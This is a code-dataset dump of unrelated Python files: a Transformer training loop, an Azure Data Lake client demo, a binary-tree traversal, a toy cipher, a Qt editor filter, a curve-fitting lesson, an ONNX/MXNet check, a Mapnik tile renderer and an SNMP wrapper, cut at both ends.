batch_idx+=1\r\n #清空梯度\r\n optimizer.zero_grad()\r\n loss,nwords=self.forward(data)\r\n loss.backward()\r\n clip = 100.0\r\n _ = torch.nn.utils.clip_grad_norm_(self.parameters(), clip)\r\n optimizer.step() \r\n stage_total_loss+=(loss.cpu().item()/nwords)\r\n epoch_loss_avg+=(loss.cpu().item() /nwords)\r\n #相当于更新权重值\r\n if batch_idx % self.config.log_steps == 0:\r\n print_loss_avg = (stage_total_loss / self.config.log_steps)\r\n message=epoch,batch_idx , len(train_loader),print_loss_avg\r\n record_train_step(self.config.logfile_path,message)\r\n stage_total_loss=0\r\n if start_iteration % self.config.save_iteration == 0:\r\n save_handler=(epoch,start_iteration, self.embedding,self.encoder,self.decoder,optimizer,self.config)\r\n save_checkpoint(save_handler)\r\n start_iteration+=1\r\n return len(train_loader),epoch_loss_avg/len(train_loader)\r\n def dev(self, epoch,dev_loader):\r\n self.encoder.eval()\r\n self.decoder.eval()\r\n self.embedding.eval()\r\n batch_size=self.config.batch_size\r\n epoch_loss_avg=0\r\n with torch.no_grad():\r\n for batch_idx, data in enumerate(dev_loader):\r\n loss,nwords=self.forward(data)\r\n epoch_loss_avg+=(loss.cpu().item() /nwords)\r\n epoch_loss_avg/=len(dev_loader)\r\n print('Evaluate Epoch: {}\\t avg Loss: {:.6f}\\ttime: {}'.format(\r\n epoch,epoch_loss_avg, time.asctime(time.localtime(time.time())) ))\r\n with open(self.config.logfile_path,'a') as f:\r\n template=' Evaluate Epoch: {}\\t avg Loss: {:.6f}\\ttime: {}\\n'\r\n str=template.format(epoch,epoch_loss_avg,\\\r\n time.asctime(time.localtime(time.time())))\r\n f.write(str)\r\n#====================Transfomer========================================\r\nclass TransformerEncoder(nn.Module):\r\n ''' Scaled Dot-Product Attention '''\r\n def __init__(self,config,voc_Size,embedding_layer):\r\n super().__init__()\r\n self.char_embedding=embedding_layer\r\n self.Positional_Encoding=PositionalEncoding(d_hid=config.embedding_size, n_position=MAX_LENGTH)\r\n self.layerstack=nn.ModuleList([ Encoder_layer(config.embedding_size,config.n_head,config.d_k,config.d_v,config.d_hidden,config.dropout) for _ in range(config.n_layers) ])\r\n\r\n def forward(self, x):\r\n #X=B,L\r\n slf_attn_mask=padding_mask(x)\r\n output=self.Positional_Encoding(self.char_embedding(x))\r\n for layer in self.layerstack:\r\n output = layer(output,slf_attn_mask=slf_attn_mask)\r\n return output\r\nclass TransformerDecoder(nn.Module):\r\n ''' Scaled Dot-Product Attention '''\r\n def __init__(self,config,voc_Size,embedding_layer):\r\n super().__init__()\r\n self.Positional_Encoding=PositionalEncoding(d_hid=config.embedding_size, n_position=MAX_LENGTH)\r\n self.layerstack=nn.ModuleList([ Decoder_layer(config.embedding_size,config.n_head,config.d_k,config.d_v,config.d_hidden,config.dropout) for _ in range(config.n_layers) ])\r\n self.char_embedding=embedding_layer\r\n def forward(self, dec_input,enc_output,enc_input):\r\n #X=B,L\r\n slf_attn_mask=padding_mask(dec_input).to(Global_device)\r\n sq_mask=sequence_mask(dec_input).to(Global_device)\r\n slf_attn_mask = (torch.gt((slf_attn_mask.float() + sq_mask.float()), 0)).float().to(Global_device)\r\n enc_dec_mask=get_attn_pad_mask(dec_input,enc_input).to(Global_device)\r\n\r\n output=self.Positional_Encoding(self.char_embedding(dec_input))\r\n \r\n\r\n for layer in self.layerstack:\r\n output = layer(output,self_attn_mask=slf_attn_mask,enc_out=enc_output,enc_dec_mask=enc_dec_mask)\r\n return output\r\nclass Transformer(nn.Module):\r\n def __init__(self, config,voc_Size):\r\n super().__init__() \r\n self.config=config\r\n self.char_embedding= Embeddings(voc_Size,config.embedding_size)\r\n self.encoder=TransformerEncoder(config,voc_Size,self.char_embedding)\r\n self.decoder=TransformerDecoder(config,voc_Size,self.char_embedding)\r\n self.tgt_proj=nn.Linear(config.embedding_size, voc_Size, bias=False)\r\n self.final_softmax = nn.Softmax(dim=2)\r\n def call(self,Q,A):\r\n enc_output=self.encoder(Q)\r\n dec_input=A[:,:-1]\r\n dec_target=A[:,1:]\r\n dec_input= dec_input.to(Global_device)\r\n dec_target= dec_target.to(Global_device)\r\n dec_out=self.decoder(dec_input,enc_output,Q)\r\n dec_logits = self.final_softmax(self.tgt_proj(dec_out)) \r\n preds=dec_logits.contiguous().view(dec_logits.size(0)*dec_logits.size(1),-1)\r\n tars=dec_target.contiguous().view(-1)\r\n loss= F.cross_entropy(preds,tars)\r\n return loss\r\n def train(self,train_loader,optimizer):\r\n start_epoch=0\r\n stage_total_loss=0\r\n for epoch in range(start_epoch,self.config.end_epoch):\r\n for batch_idx,batch in enumerate(train_loader):\r\n batch_idx+=1\r\n optimizer.zero_grad()\r\n batchQ,batchA=batch[\"history\"],batch[\"response\"]\r\n batchQ = pad_sequence(batchQ,batch_first=True, padding_value=0).to(Global_device)\r\n batchA = pad_sequence(batchA,batch_first=True, padding_value=0).to(Global_device)\r\n loss=self.call(batchQ,batchA)\r\n loss.backward()\r\n optimizer.step_and_update_lr()\r\n stage_total_loss+=loss.cpu().item() \r\n if batch_idx % self.config.log_steps == 0:\r\n print_loss_avg = (stage_total_loss / self.config.log_steps)\r\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}\\ttime: {}'.format(\r\n epoch, batch_idx , len(train_loader),\r\n 100. * batch_idx / len(train_loader), print_loss_avg, time.asctime(time.localtime(time.time())) ))\r\n with open(self.config.logfile_path,'a') as f:\r\n template=' Train Epoch: {} [{}/{}]\\tLoss: {:.6f}\\ttime: {}\\n'\r\n str=template.format(epoch,batch_idx , len(train_loader),print_loss_avg,\\\r\n time.asctime(time.localtime(time.time())))\r\n f.write(str)\r\n stage_total_loss=0\r\n","sub_path":"src/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":25327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"628899908","text":"# Make sure you've have the latest pip\n# python -m pip install --upgrade pip\n\n# To install the modules if you need them\n# pip install \n\n# To update the modules\n# pip install -U\n\n# pip modules needed\n# azure \n# msrestazure \n# azure-mgmt-resource \n# azure-mgmt-datalake-store \n# azure-mgmt-datalake-analytics\n# azure-datalake-store \n\n\n# import general Azure modules\nimport azure.mgmt.resource\nimport azure.mgmt.resource.resources\nimport msrestazure.azure_active_directory\nimport adal\n\n# import Azure Data Lake modules\nimport azure.mgmt.datalake.store\nimport azure.datalake.store\nimport azure.mgmt.datalake.analytics \n\n# All standard Python modules\nimport os\nimport sys\nimport itertools\n\ndef get_user_token_interactive(the_tenant, clientid, token_filename) :\n\n flag_ignore_cache = False # Unless you are debugging something with tokens, Recommend leave this as False\n flag_open_devicelogin_webpage = True \n \n import pickle\n import webbrowser\n import time\n RESOURCE = 'https://management.core.windows.net/'\n authority_host_url = \"https://login.microsoftonline.com\"\n authority_url = authority_host_url + '/' + the_tenant\n context = adal.AuthenticationContext(authority_url)\n devicelogin_url = \"https://aka.ms/devicelogin\"\n\n read_from_cache = os.path.isfile(token_filename) and (not(flag_ignore_cache))\n if (read_from_cache) :\n token = pickle.load( open( token_filename, \"rb\" ) )\n refresh_token = token['refreshToken']\n token = context.acquire_token_with_refresh_token( refresh_token,clientid,RESOURCE)\n else:\n code = context.acquire_user_code(RESOURCE, clientid)\n message = code['message'] \n print(message)\n\n if (flag_open_devicelogin_webpage) :\n if ( (message != None) and (type(message) is str)) :\n if (devicelogin_url in message) :\n webbrowser.open(devicelogin_url, new=0)\n\n token = context.acquire_token_with_device_code(RESOURCE, code, clientid)\n\n pickle.dump( token, open( token_filename, \"wb\" ) )\n\n # Needed for ADLS dataplane operations\n token.update({'access': token['accessToken'], \n 'resource': RESOURCE,\n 'refresh': token.get('refreshToken', False),\n 'time': time.time(), 'tenant': the_tenant, 'client': clientid})\n\n return token\n\n\n# define constants\nclientid = '04b07795-8ddb-461a-bbee-02f9e1bf7b46'\ntenant = \"microsoft.onmicrosoft.com\"\nsubscription_id = '045c28ea-c686-462f-9081-33c34e871ba3'\nadls_account_name = 'datainsightsadhoc'\nadla_account_name = 'datainsightsadhoc'\n\n# Get token\ntoken = get_user_token_interactive(tenant, clientid, r\"c:\\temp\\adl_demo_tokencache.pickle\")\n\ncredentials = msrestazure.azure_active_directory.AADTokenCredentials(token, clientid)\n\nprint ('Constructing clients')\n\nadlaAcctClient = azure.mgmt.datalake.analytics.DataLakeAnalyticsAccountManagementClient(credentials, subscription_id)\nadlsAcctClient = azure.mgmt.datalake.store.DataLakeStoreAccountManagementClient(credentials, subscription_id)\nresourceClient = azure.mgmt.resource.resources.ResourceManagementClient(credentials, subscription_id)\nadlaJobClient = azure.mgmt.datalake.analytics.DataLakeAnalyticsJobManagementClient(credentials, 'azuredatalakeanalytics.net')\nadlaCatalogClient = azure.mgmt.datalake.analytics.DataLakeAnalyticsCatalogManagementClient(credentials, 'azuredatalakeanalytics.net')\nadlsFileSystemClient = azure.datalake.store.core.AzureDLFileSystem(token, store_name = adls_account_name)\n\nprint ('Done constructing clients')\n\n## List the existing Data Lake Analytics accounts\naccounts = adlaAcctClient.account.list()\naccounts = list(accounts) # Collect all the items into one list\nfor a in accounts:\n print(\"ADLA: \" + a.name)\n\n\n## List the existing Data Lake Store accounts\naccounts = adlsAcctClient.account.list()\naccounts = list(accounts) # Collect all the items into one list\nfor a in accounts:\n print(\"ADLS: \" + a.name)\n\n## List 10 jobs in an account\njobs = adlaJobClient.job.list( adla_account_name )\njobs = itertools.islice(jobs,10) # comment this out if you want all the jobs\nfor j in jobs:\n print(\"---------------------------------\")\n print(j.name)\n print(j.submit_time)\n print(j.submitter)\n \n\n## List files in an account\nfiles = adlsFileSystemClient.ls()\nfor f in files:\n print(f)\n","sub_path":"Samples/Python_SDK/adlclient_demo.py","file_name":"adlclient_demo.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"62388334","text":"# -*- coding:utf-8 -*-\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nclass Solution:\n def Print(self, pRoot):\n # write code here\n result = []\n l = []\n l2 = []\n s = []\n x = 1\n if pRoot is None:\n return []\n l.append(pRoot)\n while len(l) > 0:\n current_node = l.pop(0)\n s.append(current_node.val)\n if current_node.left is not None:\n l2.append(current_node.left)\n if current_node.right is not None:\n l2.append(current_node.right)\n if len(l) == 0:\n if len(l2) > 0:\n l.extend(l2)\n if x & 0b1 == 0:\n result.append(s[::-1])\n else:\n result.append(s)\n l2 = []\n s = []\n x += 1\n return result","sub_path":"剑指offer/59_之字形打印二叉树.py","file_name":"59_之字形打印二叉树.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"601645028","text":"import random\nimport string\nalphabets = list(string.ascii_letters)\nencrypted_alphabets = random.sample(alphabets, len(alphabets))\nprint(alphabets)\nprint(encrypted_alphabets)\n\ndef encrypt(text):\n result = \"\"\n for i in text:\n result += encrypted_alphabets[alphabets.index(i)]\n return result\n\ndef decrypt(text):\n result = \"\"\n for i in text:\n result += alphabets[encrypted_alphabets.index(i)]\n return result\n\nencrypted_text = encrypt(\"HelloWorld\")\nprint(\"Encrypted text: \", encrypted_text)\nprint(\"Decrypted text: \",decrypt(encrypted_text))","sub_path":"monoalphabetic_cipher.py","file_name":"monoalphabetic_cipher.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"66131798","text":"try:\n from PySide2.QtCore import QEvent\n from PySide2.QtCore import QObject\n from PySide2.QtCore import Qt\n\n from PySide2.QtWidgets import QWidget, QTextEdit\nexcept ImportError:\n\n from PySide.QtCore import QEvent\n from PySide.QtCore import QObject\n from PySide.QtCore import Qt\n\n from PySide.QtGui import QWidget, QTextEdit\n\ndef _process_tab(source):\n \"\"\"\n Called when the tab is pressed\n\n :param QTextEdit source:\n :return:\n \"\"\"\n cursor = source.textCursor()\n\n if not cursor.hasSelection():\n # --- No selected text - insert single Tab (as 4 spaces)\n source.insertPlainText(\" \")\n elif cursor.selection().toPlainText().find(\"\\n\") < 0:\n # --- There is only one line selected - insert 4 spaces\n source.insertPlainText(\" \")\n else:\n # --- Indent all selected lines 4 spaces right\n start = cursor.selectionStart()\n selection_start = cursor.selectionStart()\n end = cursor.selectionEnd()\n\n current_text = source.toPlainText()\n\n # --- Find the beginning of the first selected line\n if start > 0:\n while not start == 0:\n start -= 1\n if current_text[start] == \"\\n\":\n break\n\n before = current_text[:start]\n content = current_text[start:end]\n after = current_text[end:]\n\n lines_count = content.count(\"\\n\")\n\n content = content.replace(\"\\n\", \"\\n \")\n\n source.setPlainText(before + content + after)\n\n cursor.setPosition(selection_start + 4)\n cursor.setPosition(end + (lines_count * 4), cursor.KeepAnchor)\n source.setTextCursor(cursor)\n\n\nclass EditorFilter(QObject):\n def __init__(self, parent=None):\n QObject.__init__(self, parent)\n\n def eventFilter(self, source, event):\n if event.type() == QEvent.KeyPress:\n if event.key() == Qt.Key_Tab:\n _process_tab(source)\n event.setAccepted(True)\n return True\n\n # noinspection PyCallByClass\n return QWidget.eventFilter(self, source, event)\n","sub_path":"peon_gui/code_runner_events.py","file_name":"code_runner_events.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"53688012","text":"# Lesson 37: Performing regressions\n\nimport numpy as np\nimport pandas as pd\n\n# We'll use scipy.optimize.curve_fit to do the nonlinear regression\nimport scipy.optimize\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nrc = {'lines.linewidth': 4, 'axes.labelsize': 25,\n 'axes.titlesize': 30, 'lines.markersize': 20,\n 'legend.fontsize': 16, 'xtick.labelsize': 16,\n 'ytick.labelsize': 16}\nsns.set(rc=rc)\n\n# Import data\ndf = pd.read_csv('data/bcd_gradient.csv', comment='#')\n\n# Rename columns (with dictionary)\ndf = df.rename(columns={'fractional distance from anterior': 'x',\n '[bcd] (a.u.)': 'I_bcd'})\n\n# Plot\n_ = plt.plot(df['x'], df['I_bcd'], '.')\n\nplt.show()\n\n# Specify function for curve first\n\ndef gradient_model(x, I_0, a, lam):\n \"\"\"Model for bicoid gradient: exponential decay + background\"\"\"\n\n if np.any(np.array(x) < 0):\n raise RuntimeError('x must be positive.')\n if np.any(np.array([I_0, a, lam]) < 0):\n raise RuntimeError('all params must be positive')\n\n return a + I_0 * np.exp(-x / lam)\n\n# Specify initial guess\n# one decay length is to got to ~1/3 of its value\nI_0_guess = 0.6\na_guess = 0.2\nlam_guess = 0.25\n\np0 = np.array([I_0_guess, a_guess, lam_guess])\n\n# Fit the curve\npopt, _ = scipy.optimize.curve_fit(gradient_model, df['x'], df['I_bcd'], p0=p0)\n\n# Plot the fit\nI_0_opt, a_0_opt, lam_opt = p0\nx_opt = np.linspace(0, 1, 400)\n\n# Asterisk splits up the tuple!\n_ = plt.plot(x_opt, gradient_model(x_opt, *tuple(popt)), '-k')\n","sub_path":"l37.py","file_name":"l37.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"371798042","text":"import collections\nimport os\nimport warnings\n\nimport chainer\nimport numpy as np\nimport onnx\n\nimport onnx_chainer\n\ntry:\n import mxnet\n MXNET_AVAILABLE = True\nexcept ImportError:\n warnings.warn(\n 'MXNet is not installed. Please install mxnet to use '\n 'testing utility for compatibility checking.',\n ImportWarning)\n MXNET_AVAILABLE = False\n\n\ndef check_compatibility(model, x, fn, out_keys=None, opset_version=None):\n if opset_version is None:\n opset_version = onnx.defs.onnx_opset_version()\n if not MXNET_AVAILABLE:\n raise ImportError('check_compatibility requires MXNet.')\n\n chainer.config.train = False\n\n # Forward computation\n if isinstance(x, (list, tuple)):\n for i in x:\n assert isinstance(i, (np.ndarray, chainer.Variable))\n chainer_out = model(*x)\n elif isinstance(x, np.ndarray):\n chainer_out = model(chainer.Variable(x))\n elif isinstance(x, chainer.Variable):\n chainer_out = model(x)\n else:\n raise ValueError(\n 'The \\'x\\' argument should be a list or tuple of numpy.ndarray or '\n 'chainer.Variable, or simply numpy.ndarray or chainer.Variable '\n 'itself. But a {} object was given.'.format(type(x)))\n\n if isinstance(chainer_out, (list, tuple)):\n chainer_out = [y.array for y in chainer_out]\n elif isinstance(chainer_out, dict):\n chainer_outs = [chainer_out[k] for k in out_keys]\n chainer_out = tuple(out.array if isinstance(out, chainer.Variable) else\n out for out in chainer_outs)\n elif isinstance(chainer_out, chainer.Variable):\n chainer_out = (chainer_out.array,)\n else:\n raise ValueError('Unknown output type: {}'.format(type(chainer_out)))\n\n onnx_chainer.export(model, x, fn, opset_version=opset_version)\n\n sym, arg, aux = mxnet.contrib.onnx.import_model(fn)\n\n data_names = [graph_input for graph_input in sym.list_inputs()\n if graph_input not in arg and graph_input not in aux]\n if len(data_names) > 1:\n data_shapes = [(n, x_.shape) for n, x_ in zip(data_names, x)]\n else:\n data_shapes = [(data_names[0], x.shape)]\n\n mod = mxnet.mod.Module(\n symbol=sym, data_names=data_names, context=mxnet.cpu(),\n label_names=None)\n mod.bind(\n for_training=False, data_shapes=data_shapes,\n label_shapes=None)\n mod.set_params(\n arg_params=arg, aux_params=aux, allow_missing=True,\n allow_extra=True)\n\n Batch = collections.namedtuple('Batch', ['data'])\n if isinstance(x, (list, tuple)):\n x = [mxnet.nd.array(x_.array) if isinstance(\n x_, chainer.Variable) else mxnet.nd.array(x_) for x_ in x]\n elif isinstance(x, chainer.Variable):\n x = [mxnet.nd.array(x.array)]\n elif isinstance(x, np.ndarray):\n x = [mxnet.nd.array(x)]\n\n mod.forward(Batch(x))\n mxnet_outs = mod.get_outputs()\n mxnet_out = [y.asnumpy() for y in mxnet_outs]\n\n for cy, my in zip(chainer_out, mxnet_out):\n np.testing.assert_almost_equal(cy, my, decimal=5)\n\n os.remove(fn)\n","sub_path":"onnx_chainer/testing/test_mxnet.py","file_name":"test_mxnet.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"541849521","text":"def calc_auc(pred, label):\n res = {}\n if type(label) is not list:\n pred = pred.reshape((-1))\n label = label.reshape((-1))\n assert len(label) == len(pred)\n positions = []\n for i in range(len(label)):\n positions.append((pred[i], label[i]))\n positions.sort()\n sum_pos, num_pos, num_neg = 0., 0., 0.\n for i in range(len(label)):\n if positions[i][1] > 0:\n sum_pos += i+1\n num_pos += 1\n num_neg = len(label) - num_pos\n res['pos'] = num_pos\n res['neg'] = num_neg\n if num_pos * num_neg == 0:\n res['auc'] = 1\n else:\n res['auc'] = (sum_pos - (num_pos) * (num_pos + 1) / 2) / float(num_pos * num_neg)\n return res\n\ndef print_step_auc(predict, labels):\n assert predict.shape == labels.shape\n batch_size, step, size_x, size_y = predict.shape\n res = []\n for istep in range(step):\n stepauc = calc_auc(predict[:,istep,:,:], labels[:,istep,:,:])\n res.append(stepauc['auc'])\n print ('step: %5d, auc: %f, pos:%f, neg:%f' % (istep, stepauc['auc'],\n stepauc['pos'], stepauc['neg']))\n return res\n\n\nif __name__ == '__main__':\n print (calc_auc([0.1, 0.2, 0.3, 0.4, 0.5], [0, 1, 0, 1, 1])['auc'])\n","sub_path":"meval.py","file_name":"meval.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"60575796","text":"from math import pi,cos,sin,log,exp,atan, tan, radians, sinh, degrees\nimport sys, os, time\nfrom queue import Queue\nimport threading\nfrom PyQt4.QtCore import SIGNAL, QObject\n\ndisableMappnik=False\ntry:\n import mapnik2\nexcept ImportError:\n print(\"mapnik is disabled\")\n disableMappnik=True\n\nDEG_TO_RAD = pi/180\nRAD_TO_DEG = 180/pi\nMAX_ZOOM=18\nTILESIZE=256\n\ndef minmax (a,b,c):\n a = max(a,b)\n a = min(a,c)\n return a\n\nclass GoogleProjection:\n def __init__(self,levels=18):\n self.Bc = []\n self.Cc = []\n self.zc = []\n self.Ac = []\n c = TILESIZE\n for d in range(0,levels):\n e = c/2;\n self.Bc.append(c/360.0)\n self.Cc.append(c/(2 * pi))\n self.zc.append((e,e))\n self.Ac.append(c)\n c *= 2\n \n def fromLLtoPixel(self,ll,zoom):\n d = self.zc[zoom]\n e = round(d[0] + ll[0] * self.Bc[zoom])\n f = minmax(sin(DEG_TO_RAD * ll[1]),-0.9999,0.9999)\n g = round(d[1] + 0.5*log((1+f)/(1-f))*-self.Cc[zoom])\n return (e,g)\n \n def fromPixelToLL(self,px,zoom):\n e = self.zc[zoom]\n f = (px[0] - e[0])/self.Bc[zoom]\n g = (px[1] - e[1])/-self.Cc[zoom]\n h = RAD_TO_DEG * ( 2 * atan(exp(g)) - 0.5 * pi)\n return (f,h)\n\ndef deg2num(lat_deg, lon_deg, zoom):\n lat_rad = radians(lat_deg)\n n = 2.0 ** zoom\n xtile = int((lon_deg + 180.0) / 360.0 * n)\n ytile = int((1.0 - log(tan(lat_rad) + (1 / cos(lat_rad))) / pi) / 2.0 * n)\n return (xtile, ytile)\n\ndef num2deg(xtile, ytile, zoom):\n n = 2.0 ** zoom\n lon_deg = xtile / n * 360.0 - 180.0\n lat_rad = atan(sinh(pi * (1 - 2 * ytile / n)))\n lat_deg = degrees(lat_rad)\n return (lat_deg, lon_deg)\n\nclass RenderThread:\n def __init__(self, m, prj, tileproj):\n self.m=m\n self.prj=prj\n self.tileproj = tileproj\n\n def render_tile(self, tile_uri, x, y, z):\n # Calculate pixel positions of bottom-left & top-right\n# start=time.time()\n# p0 = (x * TILESIZE, (y + 1) * TILESIZE)\n# p1 = ((x + 1) * TILESIZE, y * TILESIZE)\n#\n# # Convert to LatLong (EPSG:4326)\n# l0 = self.tileproj.fromPixelToLL(p0, z);\n# l1 = self.tileproj.fromPixelToLL(p1, z);\n#\n# # Convert to map projection (e.g. mercator co-ords EPSG:900913)\n# c0 = self.prj.forward(mapnik2.Coord(l0[0],l0[1]))\n# c1 = self.prj.forward(mapnik2.Coord(l1[0],l1[1]))\n\n l0y, l0x=num2deg(x, y+1, z)\n l1y, l1x=num2deg(x+1, y, z)\n \n # Convert to map projection (e.g. mercator co-ords EPSG:900913)\n c0 = self.prj.forward(mapnik2.Coord(l0x,l0y))\n c1 = self.prj.forward(mapnik2.Coord(l1x,l1y))\n\n # Bounding box for the tile\n if hasattr(mapnik2,'mapnik_version') and mapnik2.mapnik_version() >= 800:\n bbox = mapnik2.Box2d(c0.x,c0.y, c1.x,c1.y)\n else:\n bbox = mapnik2.Envelope(c0.x,c0.y, c1.x,c1.y)\n render_size = TILESIZE\n self.m.resize(render_size, render_size)\n self.m.zoom_to_box(bbox)\n self.m.buffer_size = 128\n\n # Render image with default Agg renderer\n im = mapnik2.Image(render_size, render_size)\n# print(\"%f\"%(time.time()-start))\n# start=time.time()\n mapnik2.render(self.m, im)\n# print(\"%f\"%(time.time()-start))\n# start=time.time()\n im.save(tile_uri, 'png256')\n# print(\"%f\"%(time.time()-start))\n\nclass MapnikWrapper(QObject):\n def __init__(self, d, m):\n QObject.__init__(self)\n self.map_file=m\n self.tile_dir=d\n if not self.tile_dir.endswith('/'):\n self.tile_dir = self.tile_dir + '/'\n \n if not os.path.isdir(self.tile_dir):\n os.makedirs(self.tile_dir)\n\n self.m = mapnik2.Map(TILESIZE, TILESIZE)\n mapnik2.load_map(self.m, self.map_file, True)\n self.prj = mapnik2.Projection(self.m.srs)\n self.tileproj = GoogleProjection(MAX_ZOOM+1)\n self.render_thread = RenderThread(self.m, self.prj, self.tileproj)\n\n def render_tiles(self, bbox, zoom, name=\"unknown\", tms_scheme=False):\n# print(self.tile_dir)\n \n ll0 = (bbox[0],bbox[3])\n ll1 = (bbox[2],bbox[1])\n z=zoom\n \n px0 = self.tileproj.fromLLtoPixel(ll0,z)\n px1 = self.tileproj.fromLLtoPixel(ll1,z)\n\n # check if we have directories in place\n zoom = \"%s\" % z\n# if not os.path.isdir(self.tile_dir + zoom):\n# os.mkdir(self.tile_dir + zoom)\n for x in range(int(px0[0]/TILESIZE),int(px1[0]/TILESIZE)+1):\n # Validate x co-ordinate\n if (x < 0) or (x >= 2**z):\n continue\n # check if we have directories in place\n str_x = \"%s\" % x\n if not os.path.isdir(self.tile_dir + zoom + '/' + str_x):\n os.mkdir(self.tile_dir + zoom + '/' + str_x)\n for y in range(int(px0[1]/TILESIZE),int(px1[1]/TILESIZE)+1):\n # Validate x co-ordinate\n if (y < 0) or (y >= 2**z):\n continue\n # flip y to match OSGEO TMS spec\n if tms_scheme:\n str_y = \"%s\" % ((2**z-1) - y)\n else:\n str_y = \"%s\" % y\n tile_uri = self.tile_dir + zoom + '/' + str_x + '/' + str_y + '.png'\n exists= \"\"\n if os.path.isfile(tile_uri):\n exists= \"exists\"\n else:\n self.render_thread.render_tile(tile_uri, x, y, z) \n# self.emit(SIGNAL(\"updateMap()\")) \n# print(name, \":\", z, x, y, exists)\n\n def render_tiles2(self, bbox, zoom, name=\"unknown\", tms_scheme=False):\n# print(self.tile_dir)\n \n px0 = (bbox[0],bbox[3])\n px1 = (bbox[2],bbox[1])\n z=zoom\n \n# px0 = self.tileproj.fromLLtoPixel(ll0,z)\n# px1 = self.tileproj.fromLLtoPixel(ll1,z)\n\n # check if we have directories in place\n zoom = \"%s\" % z\n# if not os.path.isdir(self.tile_dir + zoom):\n# os.mkdir(self.tile_dir + zoom)\n for x in range(int(px0[0]/TILESIZE),int(px1[0]/TILESIZE)+1):\n # Validate x co-ordinate\n if (x < 0) or (x >= 2**z):\n continue\n # check if we have directories in place\n str_x = \"%s\" % x\n if not os.path.isdir(self.tile_dir + zoom + '/' + str_x):\n os.mkdir(self.tile_dir + zoom + '/' + str_x)\n for y in range(int(px0[1]/TILESIZE),int(px1[1]/TILESIZE)+1):\n # Validate x co-ordinate\n if (y < 0) or (y >= 2**z):\n continue\n # flip y to match OSGEO TMS spec\n if tms_scheme:\n str_y = \"%s\" % ((2**z-1) - y)\n else:\n str_y = \"%s\" % y\n tile_uri = self.tile_dir + zoom + '/' + str_x + '/' + str_y + '.png'\n exists= \"\"\n if os.path.isfile(tile_uri):\n exists= \"exists\"\n else:\n self.render_thread.render_tile(tile_uri, x, y, z) \n# self.emit(SIGNAL(\"updateMap()\")) \n# print(name, \":\", z, x, y, exists)\n\n def render_tiles3(self, x, y, zoom, name=\"unknown\", tms_scheme=False):\n# print(self.tile_dir)\n \n z=zoom\n\n # check if we have directories in place\n zoom = \"%s\" % z\n# if not os.path.isdir(self.tile_dir + zoom):\n# os.mkdir(self.tile_dir + zoom)\n \n # Validate x co-ordinate\n if (x < 0) or (x >= 2**z):\n return\n \n # check if we have directories in place\n str_x = \"%s\" % x\n if not os.path.isdir(self.tile_dir + zoom + '/' + str_x):\n os.mkdir(self.tile_dir + zoom + '/' + str_x)\n\n # Validate x co-ordinate\n if (y < 0) or (y >= 2**z):\n return\n \n # flip y to match OSGEO TMS spec\n if tms_scheme:\n str_y = \"%s\" % ((2**z-1) - y)\n else:\n str_y = \"%s\" % y\n tile_uri = self.tile_dir + zoom + '/' + str_x + '/' + str_y + '.png'\n# exists= \"\"\n# if os.path.isfile(tile_uri):\n# exists= \"exists\"\n# else:\n self.render_thread.render_tile(tile_uri, x, y, z) \n# self.emit(SIGNAL(\"updateMap()\")) \n# print(z, x, y) \n","sub_path":"mapnik/mapnikwrapper.py","file_name":"mapnikwrapper.py","file_ext":"py","file_size_in_byte":8504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"555543289","text":"from pysnmp.entity.rfc3413.oneliner import cmdgen\nfrom pyasn1.type.univ import Null, OctetString, Integer\n\nclass Oid(object):\n \n def __init__(self, oid, name=None):\n self.oid = oid\n self.name = name\n self.value = None\n \n def isnull(self):\n return isinstance(self.value, Null)\n\n def isstring(self):\n return isinstance(self.value, OctetString)\n\n def isnumber(self):\n return isinstance(self.value, Integer)\n\n def __repr__(self):\n return \"%s:%s\" % (self.name, self.value)\n\nclass SNMPWrapException(Exception):\n pass\n\nclass SNMPWrap(object):\n \n def __init__(self, host):\n self.host = unicode(host)\n\n def __call__(self, start=0, count=1, *args):\n\n oids = []\n for i in range(count):\n for obj in args:\n oids.append(obj.oid + (start + i,))\n \n errorIndication, errorStatus, errorIndex, varBinds = \\\n cmdgen.CommandGenerator().getCmd(\n cmdgen.CommunityData('test-agent', 'public'),\n cmdgen.UdpTransportTarget((self.host, 161)),\n *oids\n )\n\n if errorIndication:\n raise SNMPWrapException(errorIndication)\n else:\n if errorStatus:\n raise SNMPWrapException('%s at %s' % (errorStatus.prettyPrint(),\n varBinds[int(errorIndex)-1]))\n\n ret = []\n bit = []\n i = 0\n ret.append(bit)\n for pair in varBinds:\n if i > 0 and i % len(args) == 0:\n ret.append(bit)\n bit = []\n o = Oid(pair[0], args[i % len(args)].name)\n o.value = pair[1]\n bit.append(o)\n i += 1\n\n return ret\n","sub_path":"labinventory/asset/utils/snmp.py","file_name":"snmp.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"161853192","text":"from rest_framework import serializers\nfrom django.contrib.auth.models import User\nfrom base.serializers import BaseSerializer\nfrom .models import (\n Organization,\n StaffCount,\n OrganizationPicture,\n Staff,\n Follow,\n Ability,\n Confirmation,\n Customer,\n MetaData\n)\nfrom users.serializers import UserMiniSerializer, 